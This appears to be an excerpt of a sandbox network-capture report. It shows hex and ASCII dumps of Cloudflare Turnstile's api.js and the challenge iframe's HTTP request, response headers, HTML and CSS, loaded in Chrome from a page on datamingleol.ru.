                                      2024-09-13 13:15:55 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 52 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                      Data Ascii: e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=nu
                                      2024-09-13 13:15:55 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 72 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                      Data Ascii: ray$/.test(a))return rt(e,r)}}function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0
                                      2024-09-13 13:15:55 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                      Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(fu
                                      2024-09-13 13:15:55 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e
                                      Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(fun
                                      2024-09-13 13:15:55 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73
                                      Data Ascii: function gt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.s
                                      2024-09-13 13:15:55 UTC1369INData Raw: 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c
                                      Data Ascii: ==Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==nul
                                      2024-09-13 13:15:55 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e
                                      Data Ascii: {return Be()?Ie=Reflect.construct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function
                                      2024-09-13 13:15:55 UTC1369INData Raw: 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28
                                      Data Ascii: tion b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(
                                      2024-09-13 13:15:55 UTC1369INData Raw: 64 65 6e 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65
                                      Data Ascii: den",f.style.overflowY="auto",f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.449749104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:55 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/ HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: iframe
                                      Referer: https://datamingleol.ru/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:55 UTC1369INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:15:55 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 165062
                                      Connection: close
                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                      origin-agent-cluster: ?1
                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      cross-origin-opener-policy: same-origin
                                      content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                      cross-origin-embedder-policy: require-corp
                                      cross-origin-resource-policy: cross-origin
                                      document-policy: js-profiling
                                      referrer-policy: same-origin
                                      critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                      2024-09-13 13:15:55 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 32 38 36 38 61 38 64 61 34 64 37 38 65 37 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                      Data Ascii: Server: cloudflareCF-RAY: 8c2868a8da4d78e7-EWRalt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:15:55 UTC1369INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                      Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                      2024-09-13 13:15:55 UTC1369INData Raw: 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 68 31 7b
                                      Data Ascii: n-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased;font-style:normal}h1{
                                      2024-09-13 13:15:55 UTC1369INData Raw: 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30 33 38 31 32 37 7d 23 65 78 70 69
                                      Data Ascii: 27;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#038127}#expi
                                      2024-09-13 13:15:55 UTC1369INData Raw: 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61
                                      Data Ascii: ink,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-overlay a:active,.theme-dark #challenge-overlay a
                                      2024-09-13 13:15:55 UTC1369INData Raw: 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65
                                      Data Ascii: p-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-link:hover{color:#949494}.theme-dark #expired-refre
                                      2024-09-13 13:15:55 UTC1369INData Raw: 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65
                                      Data Ascii: ted{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de
                                      2024-09-13 13:15:55 UTC1369INData Raw: 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63
                                      Data Ascii: -i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-c
                                      2024-09-13 13:15:55 UTC1369INData Raw: 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d
                                      Data Ascii: ding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-
